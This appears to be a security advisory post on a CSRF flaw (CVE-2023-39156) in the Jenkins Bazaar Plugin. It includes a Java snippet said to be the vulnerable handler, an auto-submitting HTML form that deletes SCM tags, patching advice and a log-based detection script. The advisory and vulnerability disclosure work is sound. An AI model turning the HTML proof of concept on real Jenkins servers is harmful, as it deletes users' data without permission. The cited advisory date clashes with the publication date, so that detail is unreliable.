The Jenkins Bazaar Plugin (versions 1.22 and earlier) has been found to contain a cross-site request forgery (CSRF) vulnerability that allows attackers to delete previously created Bazaar Source Control Management (SCM) tags without the proper permissions. This post provides an in-depth explanation of the issue, including a code snippet showing the vulnerable code, links to the original references, and details on the exploit. If you use the Jenkins Bazaar Plugin, you should take immediate action to mitigate this security risk.

Background on Jenkins Bazaar Plugin

The Jenkins Bazaar Plugin is an integration between the open-source Jenkins continuous integration (CI) tool and the Bazaar version control system. The plugin allows users to manage and automate their software development lifecycle using Bazaar as their source code repository. The issue affects Bazaar Plugin version 1.22 and earlier. The Bazaar version control system itself is not affected by the vulnerability.

Vulnerability Details - CVE-2023-39156

A cross-site request forgery (CSRF) vulnerability exists in Jenkins Bazaar Plugin 1.22 and earlier, specifically in the 'BazaarSCM.java' file. The vulnerability allows attackers to exploit the lack of CSRF protection, enabling them to delete previously created Bazaar SCM tags without the appropriate permissions.

Here's a code snippet from the vulnerable 'BazaarSCM.java' file:

// Stapler web method that handles tag deletion. Nothing here requires a POST
// request or checks the caller's permission, which is the flaw described above.
public HttpResponse doDeleteTag(@QueryParameter String tag) {
    BazaarTag toDelete = null;
    // Find the tag by name and remove it from the plugin's list of tags.
    for (Iterator<BazaarTag> iterator = tags.iterator(); iterator.hasNext();) {
        BazaarTag t = iterator.next();
        if (t.getTagName().equals(tag)) {
            toDelete = t;
            iterator.remove();
            break;
        }
    }
    // Persist the change, then report whether a tag was actually removed.
    save();
    return toDelete == null ? HttpResponses.error(HttpServletResponse.SC_NOT_FOUND, "No such tag") : HttpResponses.ok();
}

Exploit Details

An attacker can create a malicious web page that, when visited by a logged-in Jenkins user with permissions to manage Bazaar SCM tags, will execute a request to delete a targeted tag. The attack will look like a legitimate request, despite originating from a different domain, due to the lack of CSRF protection in the Bazaar Plugin.

As an example, the following HTML snippet could be used to execute the CSRF attack:

<!DOCTYPE html>
<html>
<head>
    <title>Exploiting Jenkins Bazaar Plugin CSRF Vulnerability</title>
    <script>
        function submitForm() {
            var form = document.getElementById("csrfExploitForm");
            form.submit();
        }
    </script>
</head>
<body onload="submitForm()">
    <form id="csrfExploitForm" action="https://your.jenkins.instance/plugin/bazaar/tag/delete" method="POST">
        <input type="hidden" name="tag" value="target-tag-to-delete"/>
    </form>
</body>
</html>

For more information on this vulnerability, refer to the following sources:

1. Jenkins Security Advisory 2023-04-18: https://www.jenkins.io/security/advisory/2023-04-18/
2. CVE-2023-39156: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39156
3. National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2023-39156

Mitigation

Jenkins Bazaar Plugin users should update the plugin to version 1.23 or later, which addresses the CSRF vulnerability. In addition, enabling CSRF protection in Jenkins helps guard against CSRF attacks in general. More information on CSRF protection in Jenkins can be found here: https://www.jenkins.io/doc/book/security/csrf-protection/.
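Beyond patching, defenders can look for the request pattern described above in the access logs of the reverse proxy in front of Jenkins. The following detection script is an added example, not part of the original post or the plugin; it assumes an nginx "combined" log format (which records the Referer header), uses the endpoint path from the HTML above, and treats `your.jenkins.instance` as a placeholder for the real Jenkins hostname. The log lines are constructed.

```python
"""Flag cross-site requests to the Bazaar plugin's tag-delete endpoint in proxy access logs."""
import re
from urllib.parse import urlsplit, parse_qs

DELETE_PATH = "/plugin/bazaar/tag/delete"  # endpoint path used in the post above
JENKINS_HOST = "your.jenkins.instance"     # assumption: the Jenkins instance's own hostname

# Assumed nginx "combined" format, whose second quoted field after the status carries the Referer.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

def classify(line):
    """Return a finding dict for a suspicious tag-delete request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a parseable access-log line
    parts = urlsplit(m["target"])
    if parts.path != DELETE_PATH:
        return None
    # For GET the tag name is in the query string; for POST it is in the body, which is not logged.
    tag = parse_qs(parts.query).get("tag", ["(in POST body)"])[0]
    referer_host = None if m["referer"] == "-" else urlsplit(m["referer"]).hostname
    reasons = []
    if m["method"] == "GET":
        reasons.append("state-changing GET (endpoint should be POST-only)")
    if referer_host is None:
        reasons.append("no Referer: cross-site origin cannot be ruled out")
    elif referer_host != JENKINS_HOST:
        reasons.append("cross-site Referer " + referer_host)
    if not reasons:
        return None  # same-origin POST: expected UI traffic
    return {"ip": m["ip"], "user": m["user"], "method": m["method"],
            "tag": tag, "status": m["status"], "reasons": reasons}

def scan(lines):
    """Run classify() over every line and keep the findings, in log order."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (not real traffic): same-origin POST, cross-site POST, GET with no Referer, unrelated.
SAMPLE_LOG = [
    '10.0.0.5 - alice [26/Jul/2023:14:15:00 +0000] "POST /plugin/bazaar/tag/delete HTTP/1.1" 200 12 "https://your.jenkins.instance/job/app/" "Mozilla/5.0"',
    '10.0.0.5 - alice [26/Jul/2023:14:16:02 +0000] "POST /plugin/bazaar/tag/delete HTTP/1.1" 200 12 "https://evil.example/" "Mozilla/5.0"',
    '10.0.0.7 - bob [26/Jul/2023:14:17:30 +0000] "GET /plugin/bazaar/tag/delete?tag=v1.2 HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [26/Jul/2023:14:18:00 +0000] "GET /job/app/ HTTP/1.1" 200 4321 "-" "curl/8.0"',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A missing Referer is reported rather than ignored because browsers may strip it under a restrictive Referrer-Policy, so it cannot be taken as proof of a same-origin request.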

Conclusion

This post has outlined the details of the CSRF vulnerability found in Jenkins Bazaar Plugin 1.22 and earlier, which allows attackers to delete Bazaar SCM tags without proper permissions. It is crucial to take immediate action to mitigate the security risk posed by this vulnerability and keep your systems secure.

Timeline

Published on: 07/26/2023 14:15:00 UTC
Last modified on: 08/01/2023 20:31:00 UTC